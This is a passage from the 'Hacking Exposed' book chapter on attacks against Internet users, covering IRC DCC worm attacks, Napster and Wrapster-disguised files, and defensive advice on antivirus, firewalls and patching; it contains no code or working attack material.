Chapter 16: Hacking the Internet User
647
648
Hacking Exposed: Network Security Secrets and Solutions
won’t be provided to protect the innocent—and the reputation of the author whose own
flesh and blood should’ve known better!). Like innocuous mail attachments, however,
the problem is often more insidious, as we shall see next.
]
DCCed File Attacks
Popularity: 9
Simplicity: 9
Impact: 10
Risk Rating: 7
An interesting thread on such attacks appeared on the Incidents mailing list operated
by Security Focus (; look for the INCIDENTS Digest -
10 Jul 2000 to 11 Jul 2000, #2000-131). A curious user had been offered a file via DCC (on
IRC, a method called DCC Send and DCC Get is used to connect directly to another IRC
client to Send and Get files, instead of going through the IRC network). The file was
named LIFE_STAGES.TXT (now where have we seen that before? Hint: Look back to the
section on Windows scrap file attachments earlier.). Plainly, this was either a blatant at-
tempt to cause damage to the user’s system, or an automated attack sent by a compro-
mised IRC client without its user’s knowledge.
This is one of the features of IRC that disarms new users quickly. IRC clients that have
been compromised by a worm can embed themselves into the client’s automated script
routines, automatically DCCing themselves to anyone who joins a channel, without the
user at the terminal even knowing.
Furthermore, the worm discussed in the Incidents thread was likely tailored to set
autoignore for known antivirus proponents when it joins certain channels. Such worms
also autoignore people who write to the client about “infected,”“life-stages,”“remove,”
“virus,” and many other trigger words. It can thus take time before the infected user can
be warned of the problem without triggering the autoignore function.
U
DCC Countermeasures
Fortunately, the default behavior of most IRC clients is to download DCCed files to a
user-specified download directory. The user must then navigate to this directory and
manually launch the file.
Like email attachments, DCCed files should be regarded with extreme skepticism.
Besides the usual culprits (.BAT, .COM, .EXE, .VBS, and .DLL files), watch out for
Microsoft Office documents that may contain harmful macros, as well as IRC client auto
-
mation Aliases, Popups, or Scripts that can take control of your client. Use of antivirus
scanners for such files is highly recommended.
Attempting to trace malicious users on IRC is typically fruitless and a waste of time.
As pointed out in the Incidents thread, most attackers connect to IRC using virtual hosts
Chapter 16: Hacking the Internet User
649
(vhost) via BNC (IRC Bouncer, basically an IRC proxy server). Thus, backtracing to a
given IP may reveal not the user sitting behind a terminal, but rather the server running
the BNC.
NAPSTER HACKING WITH WRAPSTER
Although we really don’t consider Napster and Wrapster a huge security threat at this time, we thought
both products demonstrate the simple ethos of hacking on a grand scale and just had to talk about
them in our book. For those who already know what this is all about, jump to the next section. If you
haven’t heard of one or either, take a gander, and then try it for yourself. Regardless of how you feel
about intellectual property and copyrights, the awesome convenience, selection, and instant gratifica
-
tion provided by Napster will surely expand your horizons.
Another example of the great potential for security conflagration brought about by
the combination of power and popularity is the revolutionary distributed file-sharing
network called Napster (). Napster is a variation on a typical
client-server file-sharing tool in which the server acts as a centralized index of MP3 audio
files that exist on the hard drives of all the users connected to the network with the
Napster client. Users search the index for an MP3 that they wish to download, and the
server connects their client directly to the user(s) who actually possesses the file(s) that
matches the query. Thus, all users who wish to participate in the bountiful goodness that
is Napster must share out some portion of their hard drive and give read/write permis-
sion to others.
Napster attempts to keep non-MP3 files off the network to avoid potential spread of
malware via the system. It does this by checking the binary headers of files copied over
the network and verifying that they resemble the MP3 header format. Versions of
Napster subsequent to beta 6 employ a new MP3 detection algorithm, one that checks for
actual frames inside a file in addition to verifying the MP3 header.
Of course, the same human ingenuity that brought us Napster conceived of a way to
smuggle non-MP3s over the network in short order. Wrapster, by Octavian (http://
members.fortunecity.com/wrapster), hides file types, disguising them as legitimate MP3
files that are “encoded” at a specific bit rate (32 kbps bitrate), allowing it to be traded
via the Napster network just like any other MP3. Users who want to see what’s
Wrapster-ized out there can simply search the Napster network for the bit rate defined
earlier, and any available Wrapster files will pop up. Or, if you know what files your
friend is sharing out, you can simply search by name and bit rate. We now have a distrib
-
uted network where wildly popular music files trade hands like money and a mechanism
for creating Trojans that resemble the music file format. Anyone see a reason to be
cautious here?
650
Hacking Exposed: Network Security Secrets and Solutions
Fortunately, Wrapster requires users to first manually extract the faux MP3 file using
a helper application before it can be executed. Simply double-clicking on a Wrapster-en
-
coded file will attempt to open it in the user’s digital music player of choice, at which
point it will be recognized as an illegitimate MP3 and fail to load. This shifts the burden
from the technology to the user to correctly identify whether the enclosed file is danger
-
ous or not. Once again, human judgment provides the only barrier between a great thing
(free music) and a formatted hard disk.
So, if Napster is not a security concern today, it certainly illustrates how applications
and people make assumptions, and how it may be possible to bypass assumptions. We
hope our discussion has encouraged further analysis of such assumptions and further
use of Napster.
Various open-source clones of the Napster software package reportedly have a vulnerability by which
an attacker could view files on a machine running a vulnerable Napster clone client (the official com
-
mercial version of Napster does not contain this vulnerability). See Bugtraq ID 1186 at
and />GLOBAL COUNTERMEASURES TO INTERNET
USER HACKING
We’ve discussed a lot of nasty techniques in this section on Internet user hacking, many
of which center around tricking users into running a virus, worm, or other malicious
code. We have also talked about many point solutions to such problems, but have
avoided until now discussions of broad-spectrum defense against such attacks.
Keep Antivirus Signatures Updated
Of course, such a defense exists and has been around for many years. It’s called antivirus
software, and if you’re not running it on your system, you’re taking a big risk. There are
dozens of vendors to choose from when it comes to picking antivirus software. Microsoft
publishes a good list at />00.ASP. Most of the major brand names (such as Symantec’s Norton Antivirus, McAfee,
Data Fellows, Trend Micro, Computer Associates’ Inoculan/InoculateIT, and the like) do
a similar job of keeping malicious code at bay.
The one major drawback to the method employed by antivirus software is that it does
not proactively provide protection against new viruses that the software has not been
taught how to recognize yet. Antivirus vendors rely on update mechanisms to periodically
download new virus definitions to customers. Thus, there is a window of vulnerability be
-
tween the first release of a new virus and the time a user updates virus definitions.
Chapter 16: Hacking the Internet User
651
As long as you’re aware of that window and you set your virus software to update it
-
self automatically at regular intervals (weekly should do it), antivirus tools provide an
-
other strong layer of defense against much of what we’ve described earlier. Remember to
enable the auto-protect features of your software to achieve full benefit, especially auto
-
matic email and floppy disk scanning. And keep the virus definitions up to date! Most
vendors offer one free year of automatic virus updates, but then require renewal of auto
-
mated subscriptions for a small fee thereafter. For example, Symantec charges around $4
for an annual renewal of its automatic LiveUpdate service. For those penny-pinchers in
the audience, you can manually download virus updates from Symantec’s web site for
free at />Also, be aware of virus hoaxes that can cause just as much damage as the viruses
themselves. See for a list of known vi
-
rus hoaxes.
Guarding the Gateways
The most efficient way to protect large numbers of users remains a tough network-layer
defense strategy. Of course, firewalls should be leveraged to the hilt in combating many
of the problems discussed in this chapter. In particular, pay attention to outbound access
control lists, which can provide critical stopping power to malicious code that seeks to
connect to rogue servers outside the castle walls.
In addition, many products are available that will scan incoming email or web traffic
for malicious mobile code. One example is Finjan’s SurfinGate technology (http://
www.finjan.com), which sits on the network border (as a plug-in to existing firewalls or
as a proxy) and scans all incoming Java, ActiveX, JavaScript, executable files, Visual Basic
Script, plug-ins, and cookies. SurfinGate then builds a behavior profile based on the ac-
tions that each code module requests. The module is then uniquely identified using an
MD5 hash so repetitive that downloads of the same module only need to be scanned
once. SurfinGate compares the behavior profile to a security policy designed by the net
-
work administrator. SurfinGate then makes an “allow” or “block” decision based on the
intersection of the profile and policy. Finjan also makes available a personal version of
SurfinGate called SurfinGuard, which provides a sandbox-like environment in which to
run downloaded code.
Finjan’s is an interesting technology that pushes management of the mobile code prob
-
lem away from overwhelmed and uninformed end-users. Its sandbox technology has the
additional advantage of being able to prevent attacks from PE (portable executable) com
-
pressors (see which can com
-
press Win32 .EXE files and actually change the binary signature of the executable. The
resulting compressed executable can bypass any static antivirus scanning engine because
the original .EXE is not extracted to its original state before it executes (thus, traditional
antivirus signature checking won’t catch it). Of course, it is only as good as the policy or
sandbox security parameters it runs under, which are still configured by those darned old
humans responsible for so many of the mistakes we’ve covered in this chapter.
SUMMARY
After writing this chapter, we simultaneously wanted to breathe a sigh of relief and to
dedicate years of further research into Internet user hacking. Indeed, we left a lot of
highly publicized attack methodologies on the cutting room floor, due primarily to ex
-
haustion at attempting to cover the scope of tried and untried attacks against common cli
-
ent software. In addition to dozens of other clever attacks from individuals like Georgi
Guninski, some of the topics that barely missed the final cut include web-based mail ser
-
vice hacking (Hotmail), AOL user hacking, broadband Internet hacking, and hacking
consumer privacy. Surely, the Internet community will be busy for years to come dealing
with all of these problems, and those as yet unimagined. Here are some tips to keep users
as secure as they can be in the meantime.
▼ Keep Internet client software updated! For Microsoft products often targeted
by such attacks, there are several ways (in order of most effective use of time):
■ Windows Update (WU) at />■ Microsoft Security Bulletins at />security/current.asp
■ Critical IE Patches at />download/default.htm#critical
■ Office Products Security Patches at />focus/catalog/focussecurity.htm
■
Microsoft Download Center (MDC) at
/>Value=‘security_patch’&OpSysID=1
■
Obtain and regularly use antivirus software. Make sure the virus signatures
are kept updated on a weekly basis, and set as many automated scanning
features as you can tolerate (automatic scanning of downloaded email is one
that should be configured).
■
Educate yourself on the potential dangers of mobile code technologies like
ActiveX and Java, and configure your Internet client software to treat these
powerful tools sensibly (see our discussion of Windows security zones in this
chapter to learn how to do this). A good introductory article on the implications
of mobile code can be found at />w6gei.htm.
652
Hacking Exposed: Network Security Secrets and Solutions
